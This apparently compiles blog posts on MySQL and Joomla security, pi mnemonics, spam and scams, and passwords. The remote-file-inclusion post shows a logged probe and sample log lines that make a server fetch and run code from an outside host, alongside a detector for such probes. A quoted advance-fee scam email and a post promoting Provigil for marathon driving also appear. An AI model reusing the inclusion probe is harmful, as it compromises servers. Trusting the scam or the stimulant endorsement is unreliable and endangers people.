Vuln: MySQL MyISAM Table Privileges Security Bypass Vulnerability

(source: SecurityFocus Vulnerabilities)

In all modern versions of MySQL (that is, every release since early in the MySQL 4 series) the DATA DIRECTORY and INDEX DIRECTORY options of CREATE TABLE, which place a MyISAM table's data and index files outside the database directory by way of symbolic links, can be used by anyone allowed to create tables to reach, and change, data belonging to other MySQL users, bypassing the table privileges that are supposed to keep them out. MySQL AB has changed MySQL 4 and MySQL 5 behavior to remedy this problem. Until a fixed build is in place, the two options can be switched off entirely by starting mysqld with --skip-symbolic-links (SHOW VARIABLES LIKE 'have_symlink' then reports DISABLED); on any server where untrusted accounts can create tables, that is a sensible permanent setting rather than a stopgap.

This is also a case for denying direct RDBMS access to any untrusted system user or application and instead forcing all access through the application layer, provided, of course, that the application layer's own access to the RDBMS is locked down too. Besides controlling access for security purposes, managing access at the application layer improves the odds of enforcing business rules consistently without resorting to stored procedures and triggers.

– Robot Terror

20 years old again — thanks, Provigil®

I just completed a 3 week vacation to California from Texas including several points in between. The last leg of the 5,065 mile journey was a 22 hour marathon from Long Beach, CA to San Antonio, TX. I drove all but 10 minutes of the trip. Oh, and I had my wife and 3 kids — ages 8, 6, and 4 — in the van, too.

I left Friday at 7:30 PM PDT and arrived at home in San Antonio, TX, at 7:30 PM CDT. That's exactly (!) 22 hours.

When I was 20 years old I made several trips from Dallas to Orange County in 22 to 24 hours. Usually with the assistance of another driver who took the wheel while I slept. That ended shortly after hitting 30 years of age. Making this drive in two segments with a Motel 6 stay in between was as rough as I could get. Sometimes the trip would take 3 days.

Now, as a 41 year old, the trip was easier than when I was in my teens or twenties. No kidding. The difference? Provigil®. I took one at 7:30 PM CDT after having been awake from 7AM with an estimated 45 minute nap in the interim. Also, about 2PM/3PM CDT I took a 10 minute nap between Ozona and Sonora, TX. Otherwise, only children's bathroom or feeding crises stood between me and the goal of reaching San Antonio ASAP.

Right now, the kids are happily sleeping at home. The wife is relaxing in her own bed and I am on the computer (as usual).

Why am I not asleep at a rest stop or paying $$$ to a cheap-rate motel? Provigil® gives me the wakefulness and lucid focus I need to keep going. It's just what my doctor ordered for my late night/day time switching schedule.

Ask your doctor about Provigil® to see if it may be right for you.

Leadership without respect is an empty vessel

Without respect from those one leads, there is no leadership, only delayed mutiny.

Leadership is a quality, not an office. Real leadership is not bestowed but recognized. Leadership is not authority; authority is right. Leadership is not power; power is might. Leadership is essential but ephemeral — to grasp it is to lose it.

The reason for the above is an odd situation I witnessed recently. At an organization I respect, some people had the opportunity to act as gatekeepers into the leadership of that organization, yet those given the opportunity failed to exercise their right. It dawned on me that they must not treasure the leadership role in this beloved organization if they could so easily refuse to take part in the gatekeeper function. That function is two-fold: on one hand it protects the leadership from an unqualified addition; on the other it helps bring in qualified additions that might otherwise be excluded. Either negative result damages leadership in the organization. To be so nonchalant as not to participate when able shows disregard not for the applicants but for the leadership.

Being in a leadership role is not easy. It's not a matter of just doing specific tasks well but also of how one's demeanor and actions outside of specific work tasks affect others. The Apostle Paul said that while he was free according to the law of the Gospel to eat meat sacrificed to idols, for the sake of those who did not have the same understanding he would refrain from eating such meat so that they would not stumble. This puts the team ahead of one's own rights. Whatever one thinks of the Apostle Paul and his message, no one can deny that his approach to building a team and a world-class organization excelled: what organization has lasted longer than the Church his work and writings helped found?

It appears that some day I may enter into a role that involves leadership. It is my sincere hope to remember this experience and this post to guide my actions in such a role.

In honor of pi day (Mar 14)

In honor of pi day (3/14 @ 1:59) I am repeating the most creative rendering of the known digits of π, "Near a Raven." Bask in the genius of this early Internet posting (after the jump):

From ian#NoSpam.iglou.com Sat Dec 23 03:25:11 1995
http://users.aol.com/s6sj7gt/mikerav.htm Poe, E.: Near A Raven

The poem below, which bears an uncanny similarity to a certain famous poem
by Edgar Allan Poe, is my latest and most difficult attempt at constrained
writing. Constrained writing is the art of constructing a work of prose or
poetry that obeys some artificially-imposed constraint. For example, there
are two published novels from which the letter 'e' is absent - Gadsby, by
Ernest Vincent Wright (1938), and La Disparition by Georges Perec (still in
print, and even available in a very recent English translation (A Void,
translated by Gilbert Adair) that also obeys the constraint!).

Your mission, should you decide to accept it, is to figure out the
constraint imposed on this poem. The answer is given after the end, so if
you want to try to figure it out, just look at the beginning of the poem.

      Poe, E.
   Near A Raven

Midnights so dreary, tired and weary.  Silently pondering volumes extolling
all by-now obsolete lore.  During my rather long nap - the weirdest tap!
An ominous vibrating sound disturbing my chamber's antedoor.
    "This", I whispered quietly, "I ignore".

Perfectly, the intellect remembers: the ghostly fires, a glittering ember.
Inflamed by lightning's outbursts, windows cast penumbras upon this floor.
Sorrowful, as one mistreated, unhappy thoughts I heeded:
  That inimitable lesson in elegance - Lenore -
    Is delighting, exciting...nevermore.

Ominously, curtains parted (my serenity outsmarted), And fear overcame my
being - the fear of "forevermore".  Fearful foreboding abided, selfish
sentiment confided, As I said, "Methinks mysterious traveler knocks afore.
    A man is visiting, of age threescore."

Taking little time, briskly addressing something: "Sir," (robustly) "Tell
what source originates clamorous noise afore?  Disturbing sleep unkindly,
is it you a-tapping, so slyly?  Why, devil incarnate!--" Here completely
unveiled I my antedoor-- Just darkness, I ascertained - nothing more.

While surrounded by darkness then, I persevered to clearly comprehend.
  I perceived the weirdest dream...of everlasting "nevermores".  Quite,
quite, quick nocturnal doubts fled - such relief! - as my intellect said,
  (Desiring, imagining still) that perchance the apparition was uttering a
whispered "Lenore".
    This only, as evermore.

Silently, I reinforced, remaining anxious, quite scared, afraid,
  While intrusive tap did then come thrice - O, so stronger than sounded
afore.  "Surely" (said silently) "it was the banging, clanging window
lattice."
  Glancing out, I quaked, upset by horrors hereinbefore,
    Perceiving: a "nevermore".

Completely disturbed, I said, "Utter, please, what prevails ahead.
  Repose, relief, cessation, or but more dreary 'nevermores'?"  The bird
intruded thence - O, irritation ever since! -
  Then sat on Pallas' pallid bust, watching me (I sat not, therefore),
    And stated "nevermores".

Bemused by raven's dissonance, my soul exclaimed, "I seek intelligence;
Explain thy purpose, or soon cease intoning forlorn 'nevermores'!"
"Nevermores", winged corvus proclaimed - thusly was a raven named?
  Actually maintain a surname, upon Pluvious seashore?
    I heard an oppressive "nevermore".

My sentiments extremely pained, to perceive an utterance so plain,
  Most interested, mystified, a meaning I hoped for.  "Surely," said the
raven's watcher, "separate discourse is wiser.
  Therefore, liberation I'll obtain, retreating heretofore -
    Eliminating all the 'nevermores' ".

Still, the detestable raven just remained, unmoving, on sculptured bust.
  Always saying "never" (by a red chamber's door).  A poor, tender
heartache maven - a sorrowful bird - a raven!
  O, I wished thoroughly, forthwith, that he'd fly heretofore.
    Still sitting, he recited "nevermores".

The raven's dirge induced alarm - "nevermore" quite wearisome.
  I meditated: "Might its utterances summarize of a calamity before?"  O, a
sadness was manifest - a sorrowful cry of unrest;
  "O," I thought sincerely, "it's a melancholy great - furthermore,
    Removing doubt, this explains 'nevermores' ".

Seizing just that moment to sit - closely, carefully, advancing beside it,
  Sinking down, intrigued, where velvet cushion lay afore.  A creature,
midnight-black, watched there - it studied my soul, unawares.
  Wherefore, explanations my insight entreated for.
    Silently, I pondered the "nevermores".

"Disentangle, nefarious bird! Disengage - I am disturbed!"
   Intently its eye burned, raising the cry within my core.  "That
delectable Lenore - whose velvet pillow this was, heretofore,
  Departed thence, unsettling my consciousness therefore.
    She's returning - that maiden - aye, nevermore."

Since, to me, that thought was madness, I renounced continuing sadness.
  Continuing on, I soundly, adamantly forswore: "Wretch," (addressing
blackbird only) "fly swiftly - emancipate me!"

  "Respite, respite, detestable raven - and discharge me, I implore!"
    A ghostly answer of: "nevermore".

" 'Tis a prophet? Wraith? Strange devil? Or the ultimate evil?"
  "Answer, tempter-sent creature!", I inquired, like before.  "Forlorn,
though firmly undaunted, with 'nevermores' quite indoctrinated,
  Is everything depressing, generating great sorrow evermore?
    I am subdued!", I then swore.

In answer, the raven turned - relentless distress it spurned.
  "Comfort, surcease, quiet, silence!" - pleaded I for.  "Will my (abusive
raven!) sorrows persist unabated?
  Nevermore Lenore respondeth?", adamantly I encored.
    The appeal was ignored.

"O, satanic inferno's denizen -- go!", I said boldly, standing then.

  "Take henceforth loathsome "nevermores" - O, to an ugly Plutonian shore!
Let nary one expression, O bird, remain still here, replacing mirth.

  Promptly leave and retreat!", I resolutely swore.
    Blackbird's riposte: "nevermore".

So he sitteth, observing always, perching ominously on these doorways.
  Squatting on the stony bust so untroubled, O therefore.  Suffering stark
raven's conversings, so I am condemned, subserving,
  To a nightmare cursed, containing miseries galore.
    Thus henceforth, I'll rise (from a darkness, a grave) -- nevermore!

            -- Original: E. Poe
            -- Redone by measuring circles.

Solution:

Despite the rather difficult constraint (to be revealed shortly), observe
how this revised version of "The Raven" duplicates the story, tone, and
rhyme scheme of the original fairly closely (including the internal rhymes
in the first and third line of each stanza). The only major concession to
the form is that the original has six lines per stanza, with the fourth and
fifth lines usually being very similar. Due to the nature of the constraint
I imposed (revealed in the next paragraph), this would have been nearly
impossible to do. Therefore, this version eliminates the similar line in
each stanza.

Give up? Hint: Start at the very beginning (with the word 'Poe') and write
next to each word the number of letters it contains. Put a decimal point
after the first digit. Look at the first few digits (or more if, like me,
you know the first several hundred by heart).  Are you impressed yet?

Even given the rather difficult constraint, I was able to match the
original very closely in spots. The very first line, although its meter is
wrong, is surprisingly close. Others which are very close, even to the
point of using many of the same words, are stanza 4 line 5, stanza 6 line
3, stanza 7 line 4, and stanza 15, line 1.

Note the use of the term "blackbird" a couple of times. Though not,
strictly speaking, correct (a raven is a black bird, not a blackbird), the
term is particularly appropriate. It is a subtle reference to Georges
Perec's La Disparition, which contains another written-with-constraints
version of "The Raven" - in this case the constraint being "write it in
French without using the letter 'e'".  In the English translation of La
Disparition by Gilbert Adair, the poem is faithfully translated into
English, also without using letter 'e'. The English version of the poem is
titled (wait for it...) Black Bird!

The poem encodes the first 740 decimals of pi. The encoding rule is this: a
word of N letters represents the digit N if N<9, the digit 0 if N=10, and
two adjacent digits if N>10 (e.g., a 12-letter word represents the digit
'1' followed by '2').

A much less well-known example is this nice poem by Joseph Shipley (1960):

     But a time I spent wandering in bloomy night;
     Yon tower, tinkling chimewise, loftily opportune.
     Out, up, and together came sudden to Sunday rite,
     The one solemnly off to correct plenilune.

I believe that "Near a Raven" establishes the world record for length of a
pi mnemonic. I would be glad to hear of other wordy attempts, either in
prose or poetry. Perhaps someone would like to attempt a short story or a
novel?!

Source: http://www.xs4all.nl/~jcdverha/scijokes/11_2.html

UPDATE: Check out ZOOM-take off tribute to PI: http://www.youtube.com/watch?v=mDu351QNoZE (Thanks, Ed!)
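The encoding rule given in the solution can be checked mechanically. The decoder below is an added example, not part of the original post or of the 1995 posting it quotes: it pulls the words out of the title and first two stanzas of the poem above (a hyphen or other punctuation breaks a word, an apostrophe is dropped so that "chamber's" counts eight letters) and maps each word's letter count to digits exactly as the rule states, then compares the result with the first hundred digits of π.

```python
import re


def word_to_digits(word):
    """Map a word to digits by the posting's rule: N letters give the digit N
    (N < 10), a 10-letter word gives 0, and a word of more than 10 letters
    gives the digits of its length (12 letters -> "12")."""
    n = len(word)
    if n == 10:
        return "0"
    return str(n)


def words(text):
    """Yield the countable words of text. Hyphens and other punctuation break
    words ("by-now" is two words); apostrophes are dropped so "chamber's"
    counts as eight letters."""
    for token in re.findall(r"[A-Za-z']+", text):
        letters = token.replace("'", "")
        if letters:
            yield letters


def decode_pi(text):
    """Return the digit string the text encodes (no decimal point)."""
    return "".join(word_to_digits(w) for w in words(text))


# Sample input: the title and first two stanzas of "Near a Raven", copied
# from the poem quoted above.
SAMPLE = """Poe, E.
Near A Raven

Midnights so dreary, tired and weary.  Silently pondering volumes extolling
all by-now obsolete lore.  During my rather long nap - the weirdest tap!
An ominous vibrating sound disturbing my chamber's antedoor.
    "This", I whispered quietly, "I ignore".

Perfectly, the intellect remembers: the ghostly fires, a glittering ember.
Inflamed by lightning's outbursts, windows cast penumbras upon this floor.
Sorrowful, as one mistreated, unhappy thoughts I heeded:
  That inimitable lesson in elegance - Lenore -
    Is delighting, exciting...nevermore.
"""

# First 100 decimal digits of pi, used as the reference to check against.
PI_100 = (
    "3141592653589793238462643383279502884197"
    "1693993751058209749445923078164062862089"
    "98628034825342117067"
)


def check(text=SAMPLE):
    """Decode text and report whether the result is a prefix of pi."""
    decoded = decode_pi(text)
    return decoded, PI_100.startswith(decoded)


if __name__ == "__main__":
    decoded, ok = check()
    print(len(decoded), "digits:", decoded, "-> matches pi" if ok else "-> MISMATCH")
```

The title and two stanzas yield 80 digits, all of which line up with π; feeding the whole poem in would exercise the two-digit branch ("hereinbefore" in stanza six is twelve letters and stands for "12").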

DOOMLA: The wave of compromised OS X Server installations starts in 3…2…1…

Apple's Open Source download page has a new featured package that is guaranteed to raise the profile of Mac OS X Server on the list of exploited servers: Joomla!, or, as I'm starting to call it, DOOM-LA. If you don't know why Joomla is veritable DOOMLA for any server, just have a look at the list of known (known!) exploits:

2008-02-23     Joomla Component simple shop 2.0 SQL Injection Vulnerability
2008-02-20     Joomla Component com_hwdvideoshare SQL Injection Vulnerability
2008-02-18     Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability
2008-02-18     Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability
2008-02-18     Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability
2008-02-16     Joomla Component com_galeria Remote SQL Injection Vulnerability
2008-02-16     Joomla Component jooget <= 2.6.8 Remote SQL Injection Vulnerability
2008-02-14     Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit
2008-02-14     Joomla Component Quiz <= 0.81 (tid) SQL Injection Vulnerability
2008-02-14     Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability
2008-02-14     Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability
2008-02-13     Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability
2008-02-12     Joomla Component pcchess <= 0.8 Remote SQL Injection Vulnerability
2008-02-12     Joomla Component rapidrecipe <= 1.6.5 SQL Injection Vulnerability
2008-02-08     Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
2008-02-07     Joomla Component com_noticias 1.0 SQL Injection Vulnerability
2008-02-07     Joomla Component com_doc Remote SQL Injection Vulnerability
2008-02-06     Joomla Component Ynews 1.0.0 (id) Remote SQL Injection Vulnerability
2008-02-03     Joomla Component Marketplace 1.1.1 SQL Injection Vulnerability
2008-02-03     Joomla Component mosDirectory 2.3.2 (catid) SQL Injection Vulnerability
2008-02-01     Joomla Component NeoReferences 1.3.1 (catid) SQL Injection Vuln

And that's just February 2008 so far. Note, too, that every entry is a third-party Joomla component rather than the core: a site's exposure grows with each extension an administrator installs, and keeping the core patched does nothing for these. Yeah. Mac OS X is DOOM-LA'ed. Thanks, Apple!

The evil truth: what really sizzles the Internet’s most powerful computer’s chips

I'm reading Clive Cussler's Atlantis Found which has an AI computer named Max (female, though) who (!) is able to reason and think with her creator/peer. In the story, while "she" crunches data she tells her creator/peer: "Go home Hiram [the creator/peer]. Take your wife and daughters to a movie. Get a good night's sleep while I sizzle my chips. Then, when you sit down in the morning, I'll really have information that will curl your ponytail." She, Max, the AI computer progeny of Hiram the Ponytailed Geek, is referring to crunching the mysteries of a pre-historical intelligent race of mankind that pre-dates the Egyptians and Sumerians.

But as I read this I am disgusted by the truth. The truth is while people sleep the world's most powerful Internet-connected computers process not mystery-solving data but spam. Spam in email, spam in blog postings, spam in every conceivable venue that will attract people's attention. /|Ag4A, Cia|1s, pre-approved credit cards, "The occasion of my letter may be a surprise to you" windfalls, lost money found, and promises of larger, more erect manhood are the things that keep the most advanced and powerful systems generating Earth Destroying heat in every Internet-facing datacenter in the world.

Spam is the subject of Hal and Max. Not mysteries of other worlds, races, peoples. Not the futures of our civilization. No. Your credit score / penis size; this is the focus of modern technology.

Welcome to the real world, red pill or not, Copper-top.

SPAM: Robot Terror’s Selection Into Princeton Premier

Flattery may get you nowhere but it sure can help build your “double opt-in” spam list. Taking a page from long-term vanity publisher Who's Who, some outfit calling itself “Princeton Premier” is looking to flatter people into divulging their contact information including “the best time to contact.” Let me make this perfectly clear: the reason a company asks for the best time to contact you is that they intend to contact you. Yes, that is the Monty Python “Spam, spam, spam, spam” theme song playing in your subconscious right now. Princeton Premier hopes your personal vanity drowns out your better judgement, however, with claims like “Inclusion is considered by many as the single highest mark of achievement.”

Just remember this: if they are including “Robot Terror” how prestigious is this registry, anyway?

Robot Terror,  

It is my pleasure to inform you that you are being considered for inclusion into the 2008-2009 Princeton
Premier Business Leaders and Professionals "Honors Edition" section of the Registry.

The 2008-2009 edition of the Registry will include biographies of the world's most accomplished
individuals. Recognition of this kind is an honor shared by thousands of executives and professionals
throughout the world each year. Inclusion is considered by many as the single highest mark of
achievement.

Upon final confirmation, you will be listed among thousands of accomplished individuals in the Princeton
Premier Registry. 

For accuracy and publication deadlines, please complete your application form and return it to us within
five business days. 

You may access the application form using the following link:

http://app.formassembly.com/forms/view/3366

On behalf of the Managing Director, we wish you continued success.

Sincerely, 

Jason Harris 

Managing Director
Princeton Premier

This email was sent to redacted@robotterror.com, by
Princeton Premier

23-35a Steinway Street
Astoria, NY 11105 United States 

If you do not wish to receive future e-mail
from Princeton Premier, please use the link below.

http://rm.resultsmail.com/unsubscribe.cfm?uid=[redacted]

Powered by ResultsMail (http://www.resultsmail.com/)

ResultsMail Privacy Policy: http://www.resultsmail.com/privacy
ResultsMail Permission Email Policy: http://www.resultsmail.com/permission

At the hosted mail form page (how lame!) are the following fields to be filled out by the honorees:

     First Name: *
     Last Name:  *
     Job Title:  *
     Company Name:
     Phone Number:  *
     Email:  *
     Full Address:
     Country:
     Personal Specialty:
     Best Time To Contact: Morning Afternoon Evening

Thankfully this appears to be simply a mailing-list building ruse and not a full-fledged phishing scam. However, it is not a big jump from combining the requested information with other data sources to handing con artists what they need to steal your identity. I wonder what the follow-up questions are going to be: will the bio have a standard format that includes your parents' names? With the above information and your mother's maiden name I have most of what I need to get access to your bank accounts. Scary.

RECOMMENDATION: Junk this solicitation!


Update: I filled out the form and visited the site. It is a social networking site built on phpFox. (They've not even turned off the “Safari warning pop-up” … lame.) Yeah. It's an attempt to make another LinkedIn. Guess what? FAIL.

What if the password generators are hacked?

For many years I have recommended the use of online (and off-line) password generators to people who need help making relatively strong passwords. But I've long had a nagging suspicion that I have not put into words until now. Right now, in fact.

What if the password generators are hacked or compromised? More specifically, what if the password generators choose from a set list of passwords that brute-force attackers then use in their automated attacks? Or, what if the list of generated passwords is compromised and, worse, related to the requesting IP address?

Limiting the set of passwords a generator can produce dramatically increases the chances of a brute-force attack succeeding: an attacker who obtains the list only has to try its entries, so a generator that picks from N stored passwords gives at most log2(N) bits of strength, however random each one looks.

A client once asked why he needed to change a password that had been guessed by an attacker, since "X" website had rated the password as "Very Strong". I told him about my favorite password of all time, the one used to launch the US nuclear missiles aimed at the Soviet Union in the movie WarGames. For the last several minutes of the film the password CPE1704TKS is flashing on the screen. Finally the computer realizes that thermonuclear war is less competitive than tic-tac-toe and stops the launch. Just because CPE1704TKS is a nice letter/number combination that is not related to my user name, domain or pet iguana doesn't mean I should use it for anything. After all, it's a well-known password. The client understood this (non-technical) explanation and changed his password (probably to CPE1704TKS1, but that's another story).

So, just as one cannot safely use a well-known password, even a well-formed one, should we encourage the use of programmatically generated or, even more suspect, website-generated passwords?
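The alternative to trusting someone else's generator is to generate locally from the operating system's random source and to size the search space yourself. The script below is an added example, not something from the original post: it draws each character independently with Python's secrets module, puts numbers on the difference between a truly random password and one picked from a fixed list, and checks a candidate against a small constructed stand-in for a "well-known password" list (a real deployment would load a breach corpus) that includes the WarGames launch code and its append-a-digit variant.

```python
import math
import secrets
import string

# Character set for generated passwords: 52 letters, 10 digits, 12 symbols.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*-_=+"


def generate_password(length=16, alphabet=ALPHABET):
    """Draw each character independently from the OS CSPRNG (secrets), so the
    search space is len(alphabet) ** length rather than the size of any list
    a third party keeps."""
    if length < 1 or len(alphabet) < 2:
        raise ValueError("length must be >= 1 and alphabet must have >= 2 symbols")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def entropy_bits_random(length, alphabet_size):
    """Bits of entropy for `length` independent uniform draws from the alphabet."""
    return length * math.log2(alphabet_size)


def entropy_bits_from_list(list_size):
    """A generator that merely picks from a fixed list of list_size entries offers
    at most log2(list_size) bits, regardless of how strong each entry looks."""
    return math.log2(list_size)


# Constructed stand-in for a well-known-password list (not a real corpus).
KNOWN_PASSWORDS = {"CPE1704TKS", "password", "123456", "letmein"}


def is_well_known(password, known=KNOWN_PASSWORDS):
    """True if the password, or the password with trailing digits removed
    (the CPE1704TKS1 trick), is on the known list."""
    if password in known:
        return True
    stripped = password.rstrip(string.digits)
    return stripped != password and stripped in known


def compare(length=12, list_size=10**6):
    """Return the entropy of a locally generated password of `length` beside
    that of a generator choosing from `list_size` canned passwords."""
    return {
        "random_bits": entropy_bits_random(length, len(ALPHABET)),
        "list_bits": entropy_bits_from_list(list_size),
    }


if __name__ == "__main__":
    pw = generate_password(16)
    print("generated:", pw, "well-known:", is_well_known(pw))
    print("CPE1704TKS1 well-known:", is_well_known("CPE1704TKS1"))
    print(compare())
```

A million canned passwords sound like a lot, but they are worth under 20 bits; twelve random characters from this alphabet are worth about 74, and the attacker gains nothing by stealing the generator.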

Tell me what you think.

Robot.

Vector of compromise: mosConfig_absolute_path

While reviewing my logs for recent hits on my blog I came across the following request:


 URL: /mosConfig_absolute_path%3Dhttp%3A/[...]/f1.txt
 Date: Monday, January 28, 2008 - 05:59
 Remote Host: 69.57.148.17


This is the classic Mambo/Joomla remote file inclusion probe: on an unpatched install running with PHP's register_globals enabled, the request overrides the mosConfig_absolute_path variable that the code uses as the base path for its include statements, so the server fetches f1.txt from the attacker's host and executes it as PHP. Fortunately I am not using Mambo or Joomla (though the blog-ware I am using has its own troubles); had I been running a vulnerable version, my server would have been infected with malware that turns it into an attack platform for DDoS attacks, spam, IRC, phishing scams and illegal content of every kind.

So, let me ask you: is your server able to survive such an automated attack as this? Is it already serving illegal purposes?
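One way to answer that question from the logs themselves is to look for any request that assigns a URL to a parameter, which is the signature of this whole class of inclusion attacks and not only of mosConfig_absolute_path. The detector below is an added example, not code from the original post: it parses common/combined log format lines, percent-decodes the request target twice (double encoding is a standard way past filters that decode once), and reports the client, parameter and URL for each hit. The log lines are constructed, with the host that the post elides replaced by example.invalid; the pattern tolerates the single slash after "http:" because that is how the probe above was recorded.

```python
import re
from urllib.parse import unquote

# Common/combined log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# A parameter being assigned a URL, whether in the path or the query string.
# One or two slashes are accepted because the logged probe shows "http:/".
RFI_RE = re.compile(
    r'(?P<param>[A-Za-z_][\w\[\]]*)=(?P<url>(?:https?|ftp):/{1,2}[^\s&]+)',
    re.IGNORECASE,
)


def decode_target(target):
    """Percent-decode twice so that double-encoded probes (%2568ttp -> http)
    are seen the way a naive, once-decoding application would see them."""
    return unquote(unquote(target))


def rfi_hits(log_text):
    """Return (ip, parameter, url) for every request that assigns a URL to a
    parameter, the signature of a remote file inclusion attempt."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = decode_target(m.group("target"))
        for r in RFI_RE.finditer(target):
            hits.append((m.group("ip"), r.group("param"), r.group("url")))
    return hits


# Constructed sample (not the blog's real log): the probe from the post with the
# elided host replaced by example.invalid, a normal page view, and a query-string
# variant of the same attack.
SAMPLE_LOG = """\
69.57.148.17 - - [28/Jan/2008:05:59:00 -0600] "GET /mosConfig_absolute_path%3Dhttp%3A/example.invalid/f1.txt HTTP/1.1" 404 512
192.0.2.10 - - [28/Jan/2008:06:00:12 -0600] "GET /index.php?option=com_content&id=5 HTTP/1.1" 200 7312
198.51.100.7 - - [28/Jan/2008:06:02:44 -0600] "GET /index.php?option=com_foo&mosConfig_absolute_path=http://example.invalid/shell.txt? HTTP/1.1" 200 7312
"""

if __name__ == "__main__":
    for ip, param, url in rfi_hits(SAMPLE_LOG):
        print(f"RFI attempt from {ip}: {param} <- {url}")
```

A 404 on the probe, as in the first sample line, means the request missed; the hits worth chasing are the ones that returned 200 against an include-capable script, and the next check is whether the server has since made outbound connections to the URL's host.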

SCAM: “Congratulation! You have received an OFFICIAL USA Green Card Letter.”

It's time for another episode of “stupid advance fee scams that target the gullible.” This time, the scammers pretend to represent the US Government. Yes, this is the “Congratulation! You have received an OFFICIAL USA Green Card Letter.” scam-mail. This letter would have you believe that the US government is awarding Green Cards to email address holders…and is using mail.com (a free email service) to process its award notifications. Read on for the email, analysis and chuckles.

                                                                           Office # 1793
                                                                                                    14781 Memorial Drive
                                                                                                    Houston, TX 77079  USA
From the U.S. Department
of State Bureau of Consular
Affairs Visa Services:
www.usagreencardlottery.org

Case Number: 411DVL2H23320L1
Preferences Categories:  DV DIVERSITY
Foreign State Chargeability: Asia-Pacific

Dear Winner.
We wish to notify you that you are among the selected lucky winners of the U.S visa lottery (Green Card) through our email
ballot lottery program held on the 20th of October 2007 in Arkansas (USA) The Green Card email ballot lottery program was
conducted under the terms of Section 203 of the Immigration and Nationality Act (INA) Section 131 of the Immigration Act of
2006 (Pub.L.101-649) The aims and objectives of the program is to give free visas to citizens of developing countries around
the world who wishes to travel to U.S and start a new life and work.

Selection.
6.3 million email addresses were randomly extracted during the 33-days extraction period that ran from 12.00 AM on September 10,
2007 until midnight, October, 9 2007. All extracted email addresses were assigned to different ticket numbers for representation
and privacy for final selection through computer draw system, your email address attached to ticket number 56402-188 drew the
lucky numbers which subsequently won you the U.S Green Card.

Notification is through the selected winning email addresses with the PA names, approximately six hundred and twenty five (625)
lucky selected winners had been notified through their selected winning email addresses.  All the selected lucky winners will
need to obtain their visas from any of the U.S Embassies and arrive here in the USA for the issuance of their Green Cards under
the U.S Government Green Card lottery program and they should act on their visa claim application quickly before the expiration
of the visa claim extended deadline which is on the (20-1-2008)

The visas have been apportioned among the six geographic regions with a maximum of seven percent available to persons born in any
single country, our Green Card experts had been apportioned among the six geographic regions. Your visa duration is 10 years
multiple entries to the U.S, it is renewable upon expiration and it permits you to travel to the U.S with your spouse.

Basic question.
How can I make the claim of my visa?
You will obtain your visa through the U.S Consular officer in your home country or any of the U.S Embassy nearest to you with your
Green Card Certificates and visa claim application documents and arrive here in U.S for the issuance of your Green Card. Selected
lucky winners living legally in the United States who wish to pursue their Green Card status should contact any of our regional
offices where their winning details falls for information's on the requirements and procedures.

Visa claim application (step 1)
Your Green Card winning details falls within our Asia/pacific booklet representative office as indicated in the draw system and we
have forwarded your winning details to our Asia/Pacific office for the processing of your Green Card Certificates and visa claim
application documents with your case number which will enable you to obtain your visa, therefore, FOR YOUR VISA PROCESSING FORM,
REQUIREMENTS AND FURTHER DETAILS, contact our Asia/pacific Region Processing Office with the below contact details;

CONTACT PERSON: MR.MICHAEL MORROW
Address: 377 Wichayanond Road, Chiang Mai 50300, Thailand
Tel: +66-26-5343 29  Hotline +66-8 471 060 74.
Fax: +66-2- 234 9834
Email:  region.office@sfax.ws

Processing Fee. $755USD
What is processing fee?
The processing fee pays for the accuracy preparation of every document. Green card experts charges a nominal fee to cover
administrative and processing costs incurred in conjunction with the careful processing of every document.

Advanced question.
How can I pay the processing fee?
The following forms of payment are accepted,
Money orders
Bank transfers
Western Union

The payment of the processing fee should be directed to any of our regional office where your winning details falls for the
processing of your Green Card Certificates and visa claim application documents. According to J.Stevenson Wilson, Author of
Visa Lottery services Report, the green card Lottery is a matter of huge benefits for those who want to try themselves abroad.
The total average fee charged by green card lottery services ($755USD) for one person,there is no correlation between the fee
charged and the quality of services provided and its benefits.

Benefits.
Winners will get FREE Airline Ticket to the USA.
people that win this Lottery will get the constant legal status of the US inhabitant, an opportunity of free country entrance
and departure, the right to be working in the USA legally and getting American salary. You may have any job in America, whether
it is a government, public or private job. A permanent residence visa (as well as American work visa) eases your life. In
addition to permanent legal residence Green Card holders also receive health, education, retirement, taxation, social security
and other benefits.

Non-Eligible Countries.
Selected winners from the following countries are not eligible to make the claim of their visas.
(Mexico-Brazil-Canada-Haiti-Columbia-Elsalvador-Jamaica-Poland-Peru-Korea-Dominican Republic-Philippines-Vietnam-Taiwan-China
(mainland born) Russia and United-Kingdom (except Northern Ireland) and its dependent countries) This is because each has more
than 50, 000 candidates in the USA.

US Embassies and Consulates.
US Embassies and consulates does not issue Green Cards, they issue all types of visas after visa interview, you will obtain your
visa from any of the US Embassy when directed and arrive here in the USA for the issuance of your Green Card.
All selected lucky winners should follow the instructions in their notification letter and must fully complete the information
requested and should go to the U.S Embassy when directed with their Green Card acknowledgement processed documents and interview
appointment letters for the issuance of their visas.

Please read and follow all the enclosed instructions very carefully.
Do not reply back to this notification email (busy)

Sincerely yours,
Mrs.Jesica Morre.

(Secretary General U.S Consulate-Kentucky)

--
10 Great Gift Ideas - Take a Look!
mail.com Shopping

Again, the scammers have pushed the boundaries of audacity by claiming to represent the US government. If you want a US Green Card, this email is aimed at you. Should you be convinced that the US is randomly sending email notifications from a free email service ... well ... let's just say that travel abroad is probably not the best thing for you to engage in; stay home near people who can look out for your best interests.

Some observations:

  • “Congratulation!”

    Ah, yes. This mistaken singular form of the idiomatic plural exclamation "congratulations!" is a standard tip-off that the sender is either not a native English writer or is not proofreading their "official documentation." Either way, this is unlikely to be a US Government document.

  • Selection: random e-mail addresses chosen from pool of 6.3 million.

